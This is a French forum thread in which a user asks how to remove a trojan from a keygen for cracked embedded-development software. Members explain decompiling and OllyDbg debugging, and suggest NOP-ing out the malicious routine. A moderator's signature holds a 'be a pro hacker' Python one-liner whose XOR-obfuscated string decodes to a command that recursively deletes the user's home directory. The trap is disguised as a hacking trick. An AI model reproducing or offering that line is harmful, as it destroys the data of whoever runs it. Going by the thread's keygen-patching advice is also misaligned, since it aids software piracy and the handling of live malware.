Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-04-2012 22:48:19

pauvrepiki
Nouveau membre
Inscription : 30-04-2012
Messages : 7

Enlever un trojan d'un keygen

Comment peut on enlever un trojan d'un keygen ?
Merci pour votre aide

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-05-2012 06:45:20

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Enlever un trojan d'un keygen

Tu décompile ton exe tu reprend l'algo de génération de clé et tu recode un keygen propre.

Ou tu paye ta licence.


1310812721.gif

Hors Ligne

#3 01-05-2012 09:23:35

pauvrepiki
Nouveau membre
Inscription : 30-04-2012
Messages : 7

Re : Enlever un trojan d'un keygen

Le but d'un échange sur un forum, est d'obtenir de l'aide, afin d'aider le lecteur à trouver une solution à son problème.Quel est l'intérêt de se faire envoyer sur " les roses"
Si quelqu'un te demande son chemin dans une ville, tu ne vas lui répondre: tu t'achètes un plan, tu te repères et tu te débrouilles Je pense que tu risquerais de te prendre un poing dans la figure.

Decompiler un exe, c'est quelque chose que je sais faire avec un désassembleur comme ollyDBG mais n'étant pas un hacker, je ne maitrise pas les techniques d'algo de clé. Il existe des tutos sur le net poue fabriquer des keygens, mais encore faut il avoir le temps d'assimiler toutes les connaissances pour faire ce travail. N'ayant pas le temps de m' attarder sur la fabrication d'un keygen dans un futur proche, le téléchargement d'un keygen pour utiliser ponctuellement un logiciel, pour répondre à un impératif professionnel me semble être la solution. On a parfois d'autres priorités. Malheureusement, il est pourri par un trojan . Je m'adresse à des personnes sensées , qui peuvent me donner une piste, un tuto ( s'il existe) pour simplementpurifier  le keygen qui fonctionne bien. Evidement, si j'avais la licence, je ne poserais pas la question....

Merci par avance

Dernière modification par pauvrepiki (01-05-2012 10:31:19)

Hors Ligne

#4 01-05-2012 10:17:02

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Enlever un trojan d'un keygen

Popop garçon !

Je ne sais pas si tu as noté mais tu es nouveau ici.
Je ne sais pas non plus si tu sais qui est coyotus.
N'importe qui qui se sera un peu intéressé un jour à la sécurité info francophone a déja vu son nom partout sur le net.
Passe voir son forum, et tu verras qu'il ne fait pas partie des rigolos qui trollent les noobs.

C'est ta question qui mérite une réponse pareille.
Pour la simple et bonne raison qu'il n'y en a pas d'autre.

Si coyotus te propose d'acheter une license, c'est parce qu'en voyant arriver un parfait inconnu poser une question vague, on se dit qu'il ne maîtrise pas, et décompiler un .exe n'est pas à la portée du premier noob venu.

(Cela dit, si c'est juste un bout de code malveillant scotché à la fin du .exe, certains antivirus arrivent à les retirer sans faire trop de dégâts.)

Donc avant de frapper les gens qui répondent aux questions, on leur dit merci.

Cordialement,

   Spawn.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 01-05-2012 11:40:31

pauvrepiki
Nouveau membre
Inscription : 30-04-2012
Messages : 7

Re : Enlever un trojan d'un keygen

Je ne manque de respect envers personne et je ne m'incline devant personne quel qu' il soit sauf devant Dieu ( Coyotus n'est pas Dieu tongue ) Disons que répondre : tu payes une licence n'a rien d'intelligent méme si je suis nouveau . . Je n'ai pas un cerveau pas trop atteint mad C'est bizarre, je n' y avais pas pensé... big_smile.


Je remercie toujours par avance (voir prermier post) et je remercie par avance ceux qui pouront m'aider à virer ce bout de code malveillant.

Mon antivirus me propose que de le mettre en quarantaine comme la plupart donc plus de  de keygen.

Solution: virer le code malveillant mais comment procèder....

si Coyotus, est un ponte de la sécurité, je peux m'attendre à  une réponse un plus pédagogique pour éliminer le trojan. Je  peux donner  mon coup de poing évangélique mais je sais pardonner aussi  wink

Bien Cordialement

Dernière modification par pauvrepiki (01-05-2012 13:20:58)

Hors Ligne

#6 01-05-2012 13:33:31

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Enlever un trojan d'un keygen

( Coyotus n'est pas Dieu  )

Pourquoi pas?
Site moi un passage de la bilble où il est dit que Coyotus n'est pas notre seigneur?
N'invoques pas le nom du tout puisant en vain, il parait que ça le fâche...
En sérieux, quelqu'un te dis de t'incliner devant coyotus?
Tu obtiens ni rien de plus ni de moins qu'une réponse à la hauteur de ta question...
Le titre est bon, il te plais, tu le répète dans ton post et tu nous remercie. C'est gentil, mais à quoi tu t'attends? roll
En plus tu as déjà localisé une première phase ou ça flanche... décris là dès le début au lieu de nous parler de Dieu, fais un effort dans la formulation de tes questions si tu veux des "réponse pédagogiques." 

je sais pardonner aussi

Je suis content que tu sois miséricordieux et que tu saches pardonner tout comme nous avons su te pardonner quelques entorses au règlement wink

4/ L'art et la manière de bien poser sa question

Les membres du forum, en règle générale, n'ont pas développé un talent particulier de "médium" leur permettant de lire dans les pensées... Il est donc important que vous nous donniez le maximum de détails afin que nous ayons tous les éléments nécessaires pour bien répondre à votre question. Expliquez nous quelle est votre configuration réseau, le matériel/système d'exploitation/programme que vous utilisez, postez une capture d'écran pour illustrer votre problème, bref n'hésitez pas à nous donner le plus d'informations possibles.

Par exemple, la question

"Je n'arrive pas à capturer de handshake"

est beaucoup trop vague pour qu'un membre du forum puisse comprendre ce qui vous pose un problème. Vous risquez donc de ne pas obtenir de réponse. En revanche, la question:

"J'ai bien ciblé mon point d'accès sous airodump-ng avec l'option -c 10, je vois que le power tourne dans les 50 60 et mon rxq est bon, il tourne dans les 80 à 90, malgré cela lorsque j'envoie des paquets de déauth avec aireplay-ng -0 je n'arrive pas à capturer de handshake. Je me suis rapproché du point d'accès afin d'améliorer la qualité du signal, comme il est précisé dans le tuto, mais toujours rien. Comment puis je faire pour enfin capturer le handshake?"

montrera aux membres que vous savez de quoi vous parlez, que vous avez pris soin de lire le tuto, et que vous faites l'effort de nous donner des informations permettant de comprendre ce qui se passe. Rédigée de cette manière, cette question donne envie de vous aider, et vous obtiendrez des réponses.

Au lieu de te mettre  en colère et de te plaindre prends le temps de voir comment fonctionne la communauté à la quelle tu te joins (où nous avons un endroit pour nous présenter, "en passant par la case départ" tu aurais évité ces désagréments)
Présentation des membres

Cordialement.

Hors Ligne

#7 01-05-2012 17:11:09

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Enlever un trojan d'un keygen

Premièrement je n'ai pas dit de payer ta licence pour t'envoyer sur les roses, mais parce que je défend l'open source, et on ne défent pas l'open source en bafouent le propriétaire.

Utilisé un programme payant keygené pour moi c'est refuser de donner sa chance à l'open source donc je ne cautionne jamais les version crackée ou les keygen.

si je te parle en donnant des indication du genre "Tu décompile ton exe tu reprend l'algo de génération de clé et tu recode un keygen propre."

c'est pour te donner les information pour tes recherches, tu ne crois pas qu'on va décompiler rechercher l'algo et recoder un keygen pour tes beau yeux, non je te donne des informations et tu décide si la procédure te parait trop lourde ou pas.

personne ne te donnera le pain en bouche avec une cuillère en argent.

Maintenant tu le prend comme tu veux, je ne dormirai pas mal ce soir pour ça.


1310812721.gif

Hors Ligne

#8 01-05-2012 17:36:38

pauvrepiki
Nouveau membre
Inscription : 30-04-2012
Messages : 7

Re : Enlever un trojan d'un keygen

Bonsoir,

Coyotus dit
"Utiliser un programme payant keygené pour moi c'est refuser de donner sa chance à l'open source donc je ne cautionne jamais les version crackée ou les keygen"

Que fais tu sur un site qui s'appelle " crack...." ? Bref, je répondrais poliment à ce monsieur en PV.....Désolé de contrarier votre Dieu Humain.


Pour les autres, je suis désolé de ne pas être un spécialiste.Je dérange en tant que noobie. J'ai fait une demande simple que je reformule :

Existe t'il un moyen de supprimer un trojan d'un Keygen ?
J'attendais une réponse du style:

La réponse est non , il n'existe pas de solution simple à notre connaissance
ou bien
tu trouveras une aide en allant sur la page www.machinchose.com/page3 ou tout est expliqué.

Cordialement

Dernière modification par pauvrepiki (01-05-2012 18:14:15)

Hors Ligne

#9 01-05-2012 18:15:27

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Enlever un trojan d'un keygen

Je ne suis pas un dieu humain loin de la et tu confond cracker et utiliser un logiciel déjà cracké ce qui est différent.

Ton keygen est surement codé en VB.Net tu sais le vérifier depuis une distribution linux avec la commande file.

qui donne une réponse avec ce genre d'info "ELF 32-bit LSB executable" dedans si tu trouve .Net dans la ligne

Il existe des utilitaire style reflector avec un tuto ici ou encore d'autre style celui-ci ou celui-là.

une fois décompiler tu essaye de reperer le code de ton troyen et tu le vire mais pour cela il faut connaitre un minimum du langage.

et tu recompile ton keygen.

J'espère que tu as assez d'indication pour débuter.

Dernière modification par coyotus (01-05-2012 18:16:16)


1310812721.gif

Hors Ligne

#10 01-05-2012 18:34:11

pauvrepiki
Nouveau membre
Inscription : 30-04-2012
Messages : 7

Re : Enlever un trojan d'un keygen

Coyotus, merci pour ta réponse. C'est une piste:)

Hors Ligne

#11 01-05-2012 21:22:52

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Enlever un trojan d'un keygen

Merci, je n'ai pas compris pourquoi tu a mal pris ma réponse, car dans ma première réponse je donne une piste même si sans nom de logiciel devrait satisfaire les personnes ayant les bases pour reverser le keygen.

Pour répondre à ton mail, je suis quelqu'un d'ouvert en général, et je ne pense pas que proposer de payer une licence fasse de moi quelqu'un de moin ouvert.

ce que je fait sur un site de crack ou qui s'appelle crack..., c'est simple, le crack du wifi consiste à connaitres les faiblesses de ce mode de connexion largement répondu afin de pouvoir mieux sécuriser ceux-ci.

Apprendre à reverser un keygen ou tout autres applications demande un minimum de connaissances qui font que les personnes qui font ce genre de demandes ont déjà une certaine expérience.

Pour ceux qui ne l'ont pas il n'y a malheureusement pas de recette miracle du genre tu prend tel programme et tu clic sur suivant suivant terminer.

Donc soit tu veux apprendre à reverser une application pour le challenge dans ce cas ma première réponse répond à tes attentes en matière de recherche pour débuter dans le domaine.

Soit tu veux utiliser un crack pour ne pas payer une licence.

Ce qui me gêne dans cette dernière c'est qu'on ne réalise pas le travail des programmeurs qui se trouve derrière qu'on ne sais pas si tu as chercher ou pas après une alternatice open-source a ton application, même si je suis conscient que cela n'est pas toujours possible.

Je n'utilise pas du tout Windows en dehors du travail, j'ai trouvé des alternative libre et gratuite à toute mes application préférée, parfois la réponse se trouve dans une recherche de l'alternative.

Je ne sais pas ce que tu veux cracker, mais il serait utile de savoir pour quelle application tu désire le keygen.

Dernière modification par coyotus (01-05-2012 21:25:29)


1310812721.gif

Hors Ligne

#12 02-05-2012 09:57:55

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Enlever un trojan d'un keygen

Normalement et d’après notre reglement, on ne fait pas dans les crackmes et les warez pour des raisons évidentes de propriété intellectuelle, si nous défendons l'open source nous respectons aussi les éditeurs de logiciels et des jeux. Mais puisque ta question est vague et concerne les trojans et qu'on aime beaucoup ces derniers ici, on va essayer de te donner quelques pistes. J'ajoute que tu formules ta question sans prendre la peine de dire bonjour, c'est pas grave mais ça agace tout le monde ici. Alors qu'est ce qu'on peut apporter vas tu me demander...

Comment tu sais que c'est un Trojan et pas un Virus ? car un trojan ou cheval de Troie permet d'ouvrir une connexion vers un pirate afin qu'il puisse prendre le contrôle à distance de l'ordinateur, je ne vois pas en quoi cela peut-être utile. As-tu exécuté ce keygen pour savoir que va faire le virus? car en observant son comportement permet apporter plus d'informations sur la manière dont il fonctionne et ainsi pouvoir localiser son code en analysant le code du keygen grâce à un désassembleur comme OllyDbg.

Mais là ce n'est pas une mince affaire et il faudrait avoir des connaissances en langage assembleur pour travailler dessus, au moins il faut savoir qu'est ce qu'on est en train de lire et que fait le programme à tel ou tel ligne, certains diront qu'il faut parler l'assembleur mieux que sa langue maternelle. Car même s'il est possible de cracker son WPA en suivant un tuto sans connaitre rien du tout, c'est peine perdue sur ce coup là sans avoir préalablement des compétences, si ce qu'on appelle plus communément le "reverse  engineering". En plus ce n'est pas un simple programme que tu dois déboguer pour comprendre son fonctionnement à partir d'instructions répétitives (tu peux désassembler le simple bloc-notes ou la calculatrice de Windows, tu verras que ce n'est pas facile d’interpréter et de comprendre le code) mais des programmes auxquels les éditeurs ont tout mis pour rendre leurs logiciels très compliqués aux attaquants, c'est ce qu'on appelle des "contre-mesures". Même ceux qui sont talentueux et ont toute l'habilité requise s'arracheraient les cheveux :

- Obfuscation de code
- chiffrement
- Insertion de code mort, c-à-d des instructions qui ne servent à rien.
- anti-debugging
- etc

Un AutoCAD coûte plus de 1100 € et Dreamweaver un peu plus 500 € ! tu crois que les éditeurs mettent des protections simples ? il faut savoir que ces éditeurs n'ont pas mis ces protections uniquement contres des hackeurs et autres pirates solitaires, mais aussi contre leur propre concurrents.

Dans ton cas, tu ouvres ton keygen avec OllyDBG et tu vas constater une fenêtre divisée en quatre parties, c'est dans celle qui se trouve en haut à gauche que se trouve ton code désassemblé. La première ligne en surbrillance est ce qu'on appelle "Entry point" ou point d’accès, c'est à partir de cette ligne que commence l’exécution du programme, elle correspond dans le code source à la fonction "main()" dans laquelle le compilateur ira chercher en premier. Mais elle correspond surtout au pointeur EIP: c'est un registre qui exécute les instructions (les op-codes en hexadécimal dans la deuxième colonne et leur équivalent en ASCII,le code ASM, dans la troisième colonne, plus compréhensible) les unes à suite des autres, tu peux suivre sa valeur dans la fenêtre de droite qui est ni plus ni moins qu'une adresse mémoire (première colonne). Donc tu auras compris, ce registre saute d'une adresse mémoire à une autre et exécute ce qu'il trouve sans se poser de trop de question. Sauf s'il trouve une instruction ''JMP" ou "CALL": la première lui indique de sauter vers une autre adresse mémoire dans le programme, et pour cela tu vas t'apercevoir que "JMP" est suivie d'une adresse mémoire, "CALL" permet elle aussi de sauter vers une autre adresse mémoire mais celle-ci est le début d'une fonction ou routine, c'est à dire un petit bout de code qui a une tâche bien précise à faire. Et à l’intérieur de cette routine il y a un autre "JMP" qui renvoi EIP vers sa position initiale celle qui été avant l'appel de la fonction de même qu'avec le premier "JMP" un autre le remet à l'endroit pour pouvoir continuer l’exécution du programme. C'est comme si tu écris dans ce thread puis tu sautes dans celui de Telestra enfin tu reviens ici tongue

Exemple:

0x0804839b       .       INC   EDI                        <-- incrémenter le registre EDI             
0x0804839c     opcode    ADD   EAX,8                      <-- additionner 8 au registre EAX
0x0804839d       .       SUB   EBX,4                      <-- soustraire 4 au registre EBX
0x0804839e       .       CMP   EDX,EAX                    <-- comparer les registres EDX et EAX
0x0804839f       .       JMP   0x08042689                 <-- sauter à l'adresse 08042689
0x0804839f       .       CALL  0x0805235d <[email protected]>    <-- executer la fonction "printf" qui se trouve à 0805..

Voila pour l'essentiel et il reste beaucoup à dire, notamment sur la pile et son empilement et inversement, la segmentation de la mémoire, l'assembleur, etc.

Que reste t-il à faire maintenant, c'est là où devrait commencer ta compétence et ton imagination. Ce qu'il faut se demander c'est pourquoi le virus se déclenche ? c'est tout simple: tu n'as pas respecter une procédure qui fait que tu dois indiquer un code ou tout autre règle d’authentification. En conséquence, à "l'Entry Point" le code va vérifier une routine si elle vrai (ta indiqué le bon code) il autorise le programme à s’exécuter normalement mais si elle fausse, il fait un "JMP" vers le code du virus. Ce que tu dois faire, c'est de trouver ces routines et les neutraliser, en supprimant les "JMP" ou bien les routines elles-même par des instructions "NOP" c'est à dire No Operation. En rencontrant un "NOP", EIP ne fait rien et saute vers la prochaine instruction.
Tu peux aussi te servir des "Breakoint" tu sélectionnes une ligne de code tu appuis sur F2, puis en saisissant F9 tu exécutes le programme uniquement jusqu'à cette ligne, tu sauras ainsi comment se comporte le programme en gardant un oeil sur la fenêtre mémoire en bas à gauche et celle de la pile à droite, pour retirer le "BreakPoint" tu sélectionnes la ligne et tu appuis à nouveau sur F2.


Voila ce qu'on peut t'aider, pas plus, je te conseille de bien prendre le temps d’étudier l'assembleur et bonne chance wink

Hors Ligne

#13 02-05-2012 10:34:38

darksabersan
Membre Hyperactif
Lieu : Toujours dans la lune
Inscription : 30-04-2010
Messages : 47

Re : Enlever un trojan d'un keygen

Fuji a écrit :

Normalement et d’après notre reglement, on ne fait pas dans les crackmes et les warez pour des raisons évidentes de propriété intellectuelle, si nous défendons l'open source nous respectons aussi les éditeurs de logiciels et des jeux. Mais puisque ta question est vague et concerne les trojans et qu'on aime beaucoup ces derniers ici, on va essayer de te donner quelques pistes. J'ajoute que tu formules ta question sans prendre la peine de dire bonjour, c'est pas grave mais ça agace tout le monde ici. Alors qu'est ce qu'on peut apporter vas tu me demander...

Comment tu sais que c'est un Trojan et pas un Virus ? car un trojan ou cheval de Troie permet d'ouvrir une connexion vers un pirate afin qu'il puisse prendre le contrôle à distance de l'ordinateur, je ne vois pas en quoi cela peut-être utile. As-tu exécuté ce keygen pour savoir que va faire le virus? car en observant son comportement permet apporter plus d'informations sur la manière dont il fonctionne et ainsi pouvoir localiser son code en analysant le code du keygen grâce à un désassembleur comme OllyDbg.

Mais là ce n'est pas une mince affaire et il faudrait avoir des connaissances en langage assembleur pour travailler dessus, au moins il faut savoir qu'est ce qu'on est en train de lire et que fait le programme à tel ou tel ligne, certains diront qu'il faut parler l'assembleur mieux que sa langue maternelle. Car même s'il est possible de cracker son WPA en suivant un tuto sans connaitre rien du tout, c'est peine perdue sur ce coup là sans avoir préalablement des compétences, si ce qu'on appelle plus communément le "reverse  engineering". En plus ce n'est pas un simple programme que tu dois déboguer pour comprendre son fonctionnement à partir d'instructions répétitives (tu peux désassembler le simple bloc-notes ou la calculatrice de Windows, tu verras que ce n'est pas facile d’interpréter et de comprendre le code) mais des programmes auxquels les éditeurs ont tout mis pour rendre leurs logiciels très compliqués aux attaquants, c'est ce qu'on appelle des "contre-mesures". Même ceux qui sont talentueux et ont toute l'habilité requise s'arracheraient les cheveux :

- Obfuscation de code
- chiffrement
- Insertion de code mort, c-à-d des instructions qui ne servent à rien.
- anti-debugging
- etc

Un AutoCAD coûte plus de 1100 € et Dreamweaver un peu plus 500 € ! tu crois que les éditeurs mettent des protections simples ? il faut savoir que ces éditeurs n'ont pas mis ces protections uniquement contres des hackeurs et autres pirates solitaires, mais aussi contre leur propre concurrents.

Dans ton cas, tu ouvres ton keygen avec OllyDBG et tu vas constater une fenêtre divisée en quatre parties, c'est dans celle qui se trouve en haut à gauche que se trouve ton code désassemblé. La première ligne en surbrillance est ce qu'on appelle "Entry point" ou point d’accès, c'est à partir de cette ligne que commence l’exécution du programme, elle correspond dans le code source à la fonction "main()" dans laquelle le compilateur ira chercher en premier. Mais elle correspond surtout au pointeur EIP: c'est un registre qui exécute les instructions (les op-codes en hexadécimal dans la deuxième colonne et leur équivalent en ASCII,le code ASM, dans la troisième colonne, plus compréhensible) les unes à suite des autres, tu peux suivre sa valeur dans la fenêtre de droite qui est ni plus ni moins qu'une adresse mémoire (première colonne). Donc tu auras compris, ce registre saute d'une adresse mémoire à une autre et exécute ce qu'il trouve sans se poser de trop de question. Sauf s'il trouve une instruction ''JMP" ou "CALL": la première lui indique de sauter vers une autre adresse mémoire dans le programme, et pour cela tu vas t'apercevoir que "JMP" est suivie d'une adresse mémoire, "CALL" permet elle aussi de sauter vers une autre adresse mémoire mais celle-ci est le début d'une fonction ou routine, c'est à dire un petit bout de code qui a une tâche bien précise à faire. Et à l’intérieur de cette routine il y a un autre "JMP" qui renvoi EIP vers sa position initiale celle qui été avant l'appel de la fonction de même qu'avec le premier "JMP" un autre le remet à l'endroit pour pouvoir continuer l’exécution du programme. C'est comme si tu écris dans ce thread puis tu sautes dans celui de Telestra enfin tu reviens ici tongue

Exemple:

0x0804839b       .       INC   EDI                        <-- incrémenter le registre EDI             
0x0804839c     opcode    ADD   EAX,8                      <-- additionner 8 au registre EAX
0x0804839d       .       SUB   EBX,4                      <-- soustraire 4 au registre EBX
0x0804839e       .       CMP   EDX,EAX                    <-- comparer les registres EDX et EAX
0x0804839f       .       JMP   0x08042689                 <-- sauter à l'adresse 08042689
0x0804839f       .       CALL  0x0805235d <[email protected]>    <-- executer la fonction "printf" qui se trouve à 0805..

Voila pour l'essentiel et il reste beaucoup à dire, notamment sur la pile et son empilement et inversement, la segmentation de la mémoire, l'assembleur, etc.

Que reste t-il à faire maintenant, c'est là où devrait commencer ta compétence et ton imagination. Ce qu'il faut se demander c'est pourquoi le virus se déclenche ? c'est tout simple: tu n'as pas respecter une procédure qui fait que tu dois indiquer un code ou tout autre règle d’authentification. En conséquence, à "l'Entry Point" le code va vérifier une routine si elle vrai (ta indiqué le bon code) il autorise le programme à s’exécuter normalement mais si elle fausse, il fait un "JMP" vers le code du virus. Ce que tu dois faire, c'est de trouver ces routines et les neutraliser, en supprimant les "JMP" ou bien les routines elles-même par des instructions "NOP" c'est à dire No Operation. En rencontrant un "NOP", EIP ne fait rien et saute vers la prochaine instruction.
Tu peux aussi te servir des "Breakoint" tu sélectionnes une ligne de code tu appuis sur F2, puis en saisissant F9 tu exécutes le programme uniquement jusqu'à cette ligne, tu sauras ainsi comment se comporte le programme en gardant un oeil sur la fenêtre mémoire en bas à gauche et celle de la pile à droite, pour retirer le "BreakPoint" tu sélectionnes la ligne et tu appuis à nouveau sur F2.


Voila ce qu'on peut t'aider, pas plus, je te conseille de bien prendre le temps d’étudier l'assembleur et bonne chance wink


@Fuji,

Alors ça, c'est de l'explication qui fait mal aux neurones. D'ailleurs, j'en ai une paire qui vient de mettre les voiles au moment où mon cerveau s’est mis en mode sans échec.
On voit tout de suite celui qui maitrise et celui qui caresse (si je peux utiliser l'expression).
Il faudra qu'un jour je me reconnecte pour comprendre
. tongue

Merci pour cette intro.. Je dois prendre mon aspirine.. big_smile


##############
Le savoir pour tous.
##############

Hors Ligne

#14 02-05-2012 20:05:25

pauvrepiki
Nouveau membre
Inscription : 30-04-2012
Messages : 7

Re : Enlever un trojan d'un keygen

Bonjour à tous,

Je vous remercie d'avoir pris le temps de me donner des pistes du travail. Je n'ai pas eu le temps de bien étudier vos réponses. Cependant, je peux vous dire que j'ai détecté la présence d'un trojan Généric en l'ouvrant dans une machine virtuelle VirtualBox ( open source wink ) équipée de AVG gratuit.
Je ne connais pas exactement les conséquences de ce trojan mais je sais qu'il finira par ralentir l'OS au point que je finirais par supprimer cette machine.
Le logiciel  cracké  est  à la base une version démo qui a fixé une limite en terme de compilation dans le domaine de l'embarqué donc ce n'est pas une usine à gaz comme Autocad. j'ai un besoin ponctuel en attendant de trouver une solution plus propre.

Cordialement

Dernière modification par pauvrepiki (02-05-2012 20:07:10)

Hors Ligne

#15 14-05-2012 14:24:31

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Enlever un trojan d'un keygen

OllyDBG est un exellent outil pour voir l'execution d'un prog en détail.
Pour le keygen pieger je dirais plutôt qu'il ne l'est peut etre pas c'est un accord entre vendeurs d'antivirus pour détecter les keygen, tout générateur non officiellement non déclarer ou non signaler seront détecter comme virus et ils invente des noms comme trojan ... smile

Dernière modification par sardineeMule (14-05-2012 14:26:10)


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#16 14-05-2012 15:38:04

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Enlever un trojan d'un keygen

Quand ont télcharge ont fais attention au lien, un site de confiance (rare) est a privilégier. big_smile


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#17 29-01-2013 20:58:48

TheNoobieWay
N00b
Inscription : 29-01-2013
Messages : 1

Re : Enlever un trojan d'un keygen

Ah les gars vous me faites délirer, le début de la conversation est ENNNNNNNNNNNNNOOOOOOORME.
Ouais je sais, je suis hors delai, et j'en ai rien à foutre big_smile

Hors Ligne

#18 20-11-2013 05:40:10

autodidact
N00b
Inscription : 20-11-2013
Messages : 1

Re : Enlever un trojan d'un keygen

Salut à vous je m'inscris juste pour remercier les auteurs (darksabersan et Fuji ) de leurs réponses même si depuis le temps ça date ... mais voilà ce qu'on pe appeler une réponse concrète malgré je l'avoue la mauvaise approche du demandeur :-) enfin bref merci de cette réponse car tu as pris le temps ça mérite bien un remerciement et on remarquera qu'à mon tour j'ai pris le temps de faire mon profil avant de poster bref on donne le temps à qui le donne et même parfois on le donne sans attendre en retour smile aller je continue mes recherches sur le même sujet smile


salut à vous :-) je n'ai pas beaucoup de temps et de plus autodidacte ... j'avance lentement mais un jour j'y arriverai surement en tous les cas c'est vraiment le kif PS : pardonner mes fautes

Hors Ligne

#19 25-11-2013 00:41:19

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Enlever un trojan d'un keygen

Merci Autodidact et bienvenue chez nous wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
5 4512 16-03-2015 15:04:11 par romeoandjuliet
1 544 28-02-2015 23:55:20 par spawn
2 1526 19-02-2015 09:11:26 par papillonH
keygen.sh par H3LLG0ST
11 991 12-02-2015 16:24:05 par H3LLG0ST
12 10859 27-08-2014 18:04:13 par coyotus

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.045 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]